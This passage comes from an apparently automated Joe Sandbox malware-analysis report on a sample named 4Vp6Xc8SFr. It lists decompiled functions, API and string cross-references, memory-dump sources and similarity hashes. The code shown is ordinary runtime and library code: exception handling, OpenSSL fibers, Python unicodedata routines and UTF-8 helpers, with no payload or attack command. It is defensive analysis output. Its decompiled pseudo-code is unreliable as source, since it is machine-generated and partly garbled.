				E00007FF77FF7DA8DD270(_t237,  *((intOrPtr*)(_t284 + 0x78)), _t281, _t282, _t280, _t282 - 0x78);
				_t177 =  *((intOrPtr*)(_t282 + 0x98));
				 *(_t284 + 0x50) = _t177;
				_t178 = _t177 | 0xffffffff;
				 *((long long*)(_t284 + 0x48)) = _t281;
				 *(_t284 + 0x40) = _t313;
				 *(_t284 + 0x38) = _t178;
				 *(_t284 + 0x30) = _t178;
				 *(_t284 + 0x28) = _t280;
				 *(_t284 + 0x20) = _t313;
				E00007FF77FF7DA8DD47C( *((intOrPtr*)(_t284 + 0x78)), _t237,  *((intOrPtr*)(_t284 + 0x68)), _t235);
				goto 0xda8ddfec;
				if (_t280[3] <= 0) goto 0xda8ddfec;
				if ( *((char*)(_t282 + 0x98)) != 0) goto 0xda8de05f;
				 *(_t284 + 0x38) = _t307;
				 *(_t284 + 0x30) =  *(_t282 + 0xa0);
				 *(_t284 + 0x28) = r14d;
				 *(_t284 + 0x20) = _t280;
				E00007FF77FF7DA8DE068(_t237, _t237,  *((intOrPtr*)(_t284 + 0x78)), _t313, _t281);
				_t173 = E00007FF77FF7DA8DCC80(_t235);
				if ( *((long long*)(_t235 + 0x38)) != 0) goto 0xda8de05f;
				return E00007FF77FF7DA8DACF0(_t173, _t178,  *(_t282 + 0x10) ^ _t284);
			}

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF7DA8DDBED

Part of subcall function 00007FF7DA8DEAF0: __GetUnwindTryBlock.LIBCMT ref: 00007FF7DA8DEB33
Part of subcall function 00007FF7DA8DEAF0: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF7DA8DEB58

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF7DA8DDCC5
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF7DA8DDF1A
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7DA8DE026

Strings

csm, xrefs: 00007FF7DA8DDC07
csm, xrefs: 00007FF7DA8DDC6E
csm, xrefs: 00007FF7DA8DDCE8

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 37d607f2ef6e4e9c222edd22de0676be1f50fecdbf07fc71a4a40dfd36176f59
Instruction ID: a2a6c8605bd352043d1787b14409685ff4ebdb26cf38f63245b935d8c47341ba
Opcode Fuzzy Hash: 37d607f2ef6e4e9c222edd22de0676be1f50fecdbf07fc71a4a40dfd36176f59
Instruction Fuzzy Hash: 54E19B73A097418AFF21AF6594402ADB7A0FB54798F880576EE8D57B86CF3CE4A0C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFCFD8660CD Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 227COMMON

Download Yara Rule

APIs

SwitchToFiber.KERNEL32 ref: 00007FFCFD923534
CreateFiber.KERNEL32 ref: 00007FFCFD9235AC
memmove.VCRUNTIME140 ref: 00007FFCFD923605
SwitchToFiber.KERNEL32 ref: 00007FFCFD923628
DeleteFiber.KERNEL32 ref: 00007FFCFD92370B

Strings

..\s\crypto\async\async.c, xrefs: 00007FFCFD923451, 00007FFCFD923468, 00007FFCFD9234B0, 00007FFCFD9235D9, 00007FFCFD923640, 00007FFCFD9236C0, 00007FFCFD9236F6, 00007FFCFD923717, 00007FFCFD923744
*, xrefs: 00007FFCFD92346F

Memory Dump Source

Source File: 00000001.00000002.331776617.00007FFCFD861000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFCFD860000, based on PE: true

Associated: 00000001.00000002.331752717.00007FFCFD860000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD86D000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8C5000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8D9000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8E9000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8FD000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFDAAC000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDAAE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDAD9000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDB0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDB30000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333064516.00007FFCFDB7E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333088610.00007FFCFDB84000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333101050.00007FFCFDB86000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333101050.00007FFCFDBA2000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333101050.00007FFCFDBA6000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffcfd860000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Fiber$Switch$CreateDeletememmove
String ID: *$..\s\crypto\async\async.c
API String ID: 81049052-1471988776
Opcode ID: dbe1ad25f8c32a160b26d7b8004dca6fb73d4df05284213f154fc875803ad330
Instruction ID: 86845ad6b1d1e7d2eae6832862817fef06214a3098c277e935179a9dabbf5f90
Opcode Fuzzy Hash: dbe1ad25f8c32a160b26d7b8004dca6fb73d4df05284213f154fc875803ad330
Instruction Fuzzy Hash: 44A1C132A09B6A86EB20EF55E460679A360EF44B90F404479DAAE437D1FF3CE545C7B0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFCFD741780 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 127COMMON

Download Yara Rule

APIs

PyType_IsSubtype.PYTHON310 ref: 00007FFCFD741855
PyUnicode_FromString.PYTHON310 ref: 00007FFCFD7418B9
_PyArg_BadArgument.PYTHON310 ref: 00007FFCFD74399E
_PyUnicode_Ready.PYTHON310 ref: 00007FFCFD7439AF

Strings

a unicode character, xrefs: 00007FFCFD743989
argument, xrefs: 00007FFCFD743990
category, xrefs: 00007FFCFD743997

Memory Dump Source

Source File: 00000001.00000002.331105965.00007FFCFD741000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFCFD740000, based on PE: true

Associated: 00000001.00000002.331093235.00007FFCFD740000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD746000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7A4000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7F0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7F3000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD84C000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331709311.00007FFCFD84F000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331736095.00007FFCFD851000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffcfd740000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Unicode_$Arg_ArgumentFromReadyStringSubtypeType_
String ID: a unicode character$argument$category
API String ID: 2803103377-2068800536
Opcode ID: 9e6e558d1a517edcbb2660dc9e7557a39b8d7c25d030286f15f755aaa99b6cf3
Instruction ID: 515539759ab750205f330f6269f3046fbe149db906c33db19830e60c229af303
Opcode Fuzzy Hash: 9e6e558d1a517edcbb2660dc9e7557a39b8d7c25d030286f15f755aaa99b6cf3
Instruction Fuzzy Hash: 3851F822B08E7AC5EB569B05D46027DA2A5EB46785F040136DE6E4B7D8FF2CE841C3B0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8EDD08 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 77%

			E00007FF77FF7DA8EDD08(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
				void* _t35;
				signed long long _t56;
				intOrPtr _t60;
				void* _t71;
				signed long long _t72;
				long long _t78;
				void* _t82;
				signed long long _t88;
				signed long long _t89;
				signed long long _t90;
				WCHAR* _t91;
				long _t94;
				void* _t97;
				WCHAR* _t102;

				 *((long long*)(_t82 + 8)) = __rbx;
				 *((long long*)(_t82 + 0x10)) = _t78;
				 *((long long*)(_t82 + 0x18)) = __rsi;
				r15d = __ecx;
				_t72 = _t71 | 0xffffffff;
				_t89 =  *0xda90d008; // 0xe3add53f52b8
				_t88 =  *(0x7ff7da8d0000 + 0x4cf00 + _t102 * 8) ^ _t89;
				asm("dec ecx");
				if (_t88 == _t72) goto 0xda8ede4b;
				if (_t88 == 0) goto 0xda8edd6d;
				_t56 = _t88;
				goto 0xda8ede4d;
				if (__r8 == __r9) goto 0xda8ede30;
				_t60 =  *((intOrPtr*)(0x7ff7da8d0000 + 0x4ce50 + __rsi * 8));
				if (_t60 == 0) goto 0xda8edd95;
				if (_t60 != _t72) goto 0xda8ede8a;
				goto 0xda8ede1c;
				r8d = 0x800;
				LoadLibraryExW(_t102, _t97, _t94);
				if (_t56 != 0) goto 0xda8ede6a;
				if (GetLastError() != 0x57) goto 0xda8ede0a;
				_t14 = _t56 - 0x50; // -80
				_t35 = _t14;
				r8d = _t35;
				if (E00007FF77FF7DA8E9950(__r8) == 0) goto 0xda8ede0a;
				r8d = _t35;
				if (E00007FF77FF7DA8E9950(__r8) == 0) goto 0xda8ede0a;
				r8d = 0;
				LoadLibraryExW(_t91, _t71);
				if (_t56 != 0) goto 0xda8ede6a;
				 *((intOrPtr*)(0x7ff7da8d0000 + 0x4ce50 + __rsi * 8)) = _t72;
				if (__r8 + 4 != __r9) goto 0xda8edd76;
				_t90 =  *0xda90d008; // 0xe3add53f52b8
				asm("dec eax");
				 *(0x7ff7da8d0000 + 0x4cf00 + _t102 * 8) = _t72 ^ _t90;
				return 0;
			}

0x7ff7da8edd08
0x7ff7da8edd0d
0x7ff7da8edd12
0x7ff7da8edd24
0x7ff7da8edd2e
0x7ff7da8edd44
0x7ff7da8edd4b
0x7ff7da8edd54
0x7ff7da8edd5a
0x7ff7da8edd63
0x7ff7da8edd65
0x7ff7da8edd68
0x7ff7da8edd70
0x7ff7da8edd79
0x7ff7da8edd85
0x7ff7da8edd8a
0x7ff7da8edd90
0x7ff7da8edda2
0x7ff7da8edda8
0x7ff7da8eddb4
0x7ff7da8eddc3
0x7ff7da8eddc5
0x7ff7da8eddc5
0x7ff7da8eddcb
0x7ff7da8edddc
0x7ff7da8eddde
0x7ff7da8eddf2
0x7ff7da8eddf4
0x7ff7da8eddfc
0x7ff7da8ede08
0x7ff7da8ede14
0x7ff7da8ede23
0x7ff7da8ede29
0x7ff7da8ede3d
0x7ff7da8ede43
0x7ff7da8ede69

APIs

FreeLibrary.KERNEL32(?,00000000,?,00007FF7DA8EE0A2,?,?,-00000018,00007FF7DA8EA173,?,?,?,00007FF7DA8EA06A,?,?,?,00007FF7DA8E53C2), ref: 00007FF7DA8EDE84
GetProcAddress.KERNEL32(?,00000000,?,00007FF7DA8EE0A2,?,?,-00000018,00007FF7DA8EA173,?,?,?,00007FF7DA8EA06A,?,?,?,00007FF7DA8E53C2), ref: 00007FF7DA8EDE90

Strings

api-ms-, xrefs: 00007FF7DA8EDDCE
ext-ms-, xrefs: 00007FF7DA8EDDE1

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 05b603102d198864137dbc22e1d5c79a95c136e16b7dfd1a6baa0dacd04be2dd
Instruction ID: 38165dca2cd61530afb46067c13f525548d298152e40c60e04b0d855c0d1de73
Opcode Fuzzy Hash: 05b603102d198864137dbc22e1d5c79a95c136e16b7dfd1a6baa0dacd04be2dd
Instruction Fuzzy Hash: 5C411322B09A03C1FA13BB12980457DA391BF64BA0FC88176DD0D97786EF3DE9598360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFCFD741000 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E00007FFC7FFCFD741000(void* __rax, long long __rbx, signed int __rcx, void* __rdx, long long __rsi, long long __r14, long long _a8, long long _a16, long long _a24) {
				void* _t39;
				void* _t44;
				signed int _t54;
				unsigned long long _t69;
				signed char* _t71;

				_a24 = __rbx;
				if (( *( *((intOrPtr*)(__rdx + 8)) + 0xa8) & 0x10000000) == 0) goto 0xfd743618;
				if (( *(__rdx + 0x20) & 0x00000080) == 0) goto 0xfd74363d;
				if ( *((long long*)(__rdx + 0x10)) != 1) goto 0xfd743618;
				_t54 =  *(__rdx + 0x20);
				_a8 = __rsi;
				_a16 = __r14;
				if ((_t54 & 0x0000001c) != 4) goto 0xfd74110e;
				if ((_t54 & 0x00000020) == 0) goto 0xfd74364f;
				_t39 =  ==  ? 0x48 : 0x30;
				_t69 = __rax + __rdx;
				if (( *_t69 & 0x000000ff) - 0x110000 >= 0) goto 0xfd74367c;
				_t71 = (_t69 >> 7) + (_t69 >> 7) * 2;
				if (__rcx == 0) goto 0xfd7410eb;
				if ( *((intOrPtr*)(__rcx + 8)) == __imp__PyModule_Type) goto 0xfd7410eb;
				__imp__PyType_IsSubtype();
				if (( *(0x7ffcfd740000 + 0xe3920 + __rcx * 2) & 0x0000ffff) != 0) goto 0xfd7410eb;
				_t44 =  *((intOrPtr*)(__rcx + 0x18))();
				if (_t71[1] == 0) goto 0xfd74113d;
				if (( *_t71 & 0x000000ff) != 0xff) goto 0xfd741141;
				__imp__PyUnicode_FromString();
				return _t44;
			}

0x7ffcfd741000
0x7ffcfd74101e
0x7ffcfd741028
0x7ffcfd741033
0x7ffcfd741039
0x7ffcfd741040
0x7ffcfd741048
0x7ffcfd741053
0x7ffcfd74105b
0x7ffcfd74106e
0x7ffcfd741071
0x7ffcfd741084
0x7ffcfd7410ac
0x7ffcfd7410bc
0x7ffcfd7410cc
0x7ffcfd7410ce
0x7ffcfd7410d6
0x7ffcfd7410da
0x7ffcfd7410e1
0x7ffcfd7410e9
0x7ffcfd7410f3
0x7ffcfd74110d

APIs

PyType_IsSubtype.PYTHON310 ref: 00007FFCFD7410CE
PyUnicode_FromString.PYTHON310 ref: 00007FFCFD7410F3
_PyArg_BadArgument.PYTHON310 ref: 00007FFCFD743630
_PyUnicode_Ready.PYTHON310 ref: 00007FFCFD743640

Strings

bidirectional, xrefs: 00007FFCFD743629
a unicode character, xrefs: 00007FFCFD74361B
argument, xrefs: 00007FFCFD743622

Memory Dump Source

Source File: 00000001.00000002.331105965.00007FFCFD741000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFCFD740000, based on PE: true

Associated: 00000001.00000002.331093235.00007FFCFD740000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD746000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7A4000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7F0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7F3000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD84C000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331709311.00007FFCFD84F000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331736095.00007FFCFD851000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffcfd740000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Unicode_$Arg_ArgumentFromReadyStringSubtypeType_
String ID: a unicode character$argument$bidirectional
API String ID: 2803103377-2110215792
Opcode ID: 13a7a07f0953b1032acf04b55cf0ef29e811e5461d08e34cfb79163082fa4ee2
Instruction ID: 84b81c5a9b533b7e47cd840ba67bad9c8cd5b8b33f22039a1fd0f4bdc710ec2c
Opcode Fuzzy Hash: 13a7a07f0953b1032acf04b55cf0ef29e811e5461d08e34cfb79163082fa4ee2
Instruction Fuzzy Hash: A741E862B08E6AC1EB165B15D470279A361EF46B96F444036DE6E4B3E8EF2DD844C3B0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8D7570 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 104COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7DA8D101D), ref: 00007FF7DA8D760F
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7DA8D101D), ref: 00007FF7DA8D765F

Strings

WideCharToMultiByte, xrefs: 00007FF7DA8D76A8
win32_utils_to_utf8, xrefs: 00007FF7DA8D7698
Out of memory., xrefs: 00007FF7DA8D7691
Failed to get UTF-8 buffer size., xrefs: 00007FF7DA8D76A1
Failed to encode wchar_t as UTF-8., xrefs: 00007FF7DA8D7688

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: ByteCharMultiWide
String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
API String ID: 626452242-27947307
Opcode ID: 1a96fc14a779c4ec32fca2acc22782d34526e45aaf800821a7dd3fd10f6edcbd
Instruction ID: 9e2d178cc8cfe57f0d13e14533101a5a6936666a3e9477e1d0f5788ba0be89af
Opcode Fuzzy Hash: 1a96fc14a779c4ec32fca2acc22782d34526e45aaf800821a7dd3fd10f6edcbd
Instruction Fuzzy Hash: DC418232A08B8285FA22AF15F44016EE764FB54790FD84176DE8D47B96EF3CD466C710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFCFD744628 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 87COMMON

Download Yara Rule

APIs

PyType_IsSubtype.PYTHON310 ref: 00007FFCFD74465F
PyUnicode_FromString.PYTHON310 ref: 00007FFCFD74467B
memcpy.VCRUNTIME140 ref: 00007FFCFD7446F7
PyOS_snprintf.PYTHON310 ref: 00007FFCFD744739
PyUnicode_FromStringAndSize.PYTHON310 ref: 00007FFCFD744766

Strings

, xrefs: 00007FFCFD74470F
%04X, xrefs: 00007FFCFD744724

Memory Dump Source

Source File: 00000001.00000002.331105965.00007FFCFD741000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFCFD740000, based on PE: true

Associated: 00000001.00000002.331093235.00007FFCFD740000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD746000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7A4000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7F0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7F3000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD84C000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331709311.00007FFCFD84F000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331736095.00007FFCFD851000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffcfd740000_4Vp6Xc8SFr.jbxd

Similarity

API ID: FromStringUnicode_$S_snprintfSizeSubtypeType_memcpy
String ID: $%04X
API String ID: 762632776-4013080060
Opcode ID: 928d9d27546edd71c63b2c2ce22ca69dd474578865840046bf2d51b3e75f5fa5
Instruction ID: 69f8a6e41b0a24880e5b806765ae6ac062db5da146d05064a02322755740c155
Opcode Fuzzy Hash: 928d9d27546edd71c63b2c2ce22ca69dd474578865840046bf2d51b3e75f5fa5
Instruction Fuzzy Hash: 5431C662A08DA9C1EB228B15D8243B9A3A1FB46B65F450336C97D0B6CCEF6CE445C370

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFCFD744CC4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 78COMMON

Download Yara Rule

APIs

_PyArg_BadArgument.PYTHON310 ref: 00007FFCFD744CFD
_PyUnicode_Ready.PYTHON310 ref: 00007FFCFD744D13
PyErr_Occurred.PYTHON310 ref: 00007FFCFD744DAD
PyLong_FromLong.PYTHON310 ref: 00007FFCFD744DBE

Strings

a unicode character, xrefs: 00007FFCFD744CE8
argument, xrefs: 00007FFCFD744CEF
mirrored, xrefs: 00007FFCFD744CF6

Memory Dump Source

Source File: 00000001.00000002.331105965.00007FFCFD741000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFCFD740000, based on PE: true

Associated: 00000001.00000002.331093235.00007FFCFD740000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD746000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7A4000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7F0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7F3000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD84C000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331709311.00007FFCFD84F000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331736095.00007FFCFD851000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffcfd740000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Arg_ArgumentErr_FromLongLong_OccurredReadyUnicode_
String ID: a unicode character$argument$mirrored
API String ID: 3097524968-4001128513
Opcode ID: 2af9e1d20706056489e69fa7a5b68c4204390a1b6ed519ae8f657ced546d95a6
Instruction ID: 6bbb2db76d538750e99ae948023fe3cfd3e2c694cc7e93f42f9eaf94f4c2ad6a
Opcode Fuzzy Hash: 2af9e1d20706056489e69fa7a5b68c4204390a1b6ed519ae8f657ced546d95a6
Instruction Fuzzy Hash: 6C319260B08E2AC2FB554B12D4713795291AF46B5AF044036CB2D4B2DCFF6CE845EAF0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFCFD7441F0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 78COMMON

Download Yara Rule

APIs

_PyArg_BadArgument.PYTHON310 ref: 00007FFCFD744229
_PyUnicode_Ready.PYTHON310 ref: 00007FFCFD74423F
PyErr_Occurred.PYTHON310 ref: 00007FFCFD7442D9
PyLong_FromLong.PYTHON310 ref: 00007FFCFD7442EA

Strings

a unicode character, xrefs: 00007FFCFD744214
argument, xrefs: 00007FFCFD74421B
combining, xrefs: 00007FFCFD744222

Memory Dump Source

Source File: 00000001.00000002.331105965.00007FFCFD741000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFCFD740000, based on PE: true

Associated: 00000001.00000002.331093235.00007FFCFD740000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD746000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7A4000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7F0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7F3000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD84C000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331709311.00007FFCFD84F000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331736095.00007FFCFD851000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffcfd740000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Arg_ArgumentErr_FromLongLong_OccurredReadyUnicode_
String ID: a unicode character$argument$combining
API String ID: 3097524968-4202047184
Opcode ID: d460b3160a4902d8517a0351533df7bc08d70ff5da73a78ceb230b2c7815c23d
Instruction ID: 647b04dd7e699a633b8dd045ba4e4ee4e4def09bab0c4ad59603f723542d7616
Opcode Fuzzy Hash: d460b3160a4902d8517a0351533df7bc08d70ff5da73a78ceb230b2c7815c23d
Instruction Fuzzy Hash: F831C621B08E2AC2FB554B9294713795291AF46B5AF444136CA2D4B2CCFF6CE845E3F0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8D7AB0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 63COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,00007FF7DA8D3679), ref: 00007FF7DA8D7AF1

Part of subcall function 00007FF7DA8D2620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7DA8D76B4,?,?,?,?,?,?,?,?,?,?,?,00007FF7DA8D101D), ref: 00007FF7DA8D2654
Part of subcall function 00007FF7DA8D2620: MessageBoxW.USER32 ref: 00007FF7DA8D272C

WideCharToMultiByte.KERNEL32(?,00007FF7DA8D3679), ref: 00007FF7DA8D7B65

Strings

WideCharToMultiByte, xrefs: 00007FF7DA8D7B05, 00007FF7DA8D7B76
win32_utils_to_utf8, xrefs: 00007FF7DA8D7B32
Out of memory., xrefs: 00007FF7DA8D7B2B
Failed to get UTF-8 buffer size., xrefs: 00007FF7DA8D7AFE
Failed to encode wchar_t as UTF-8., xrefs: 00007FF7DA8D7B6F

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
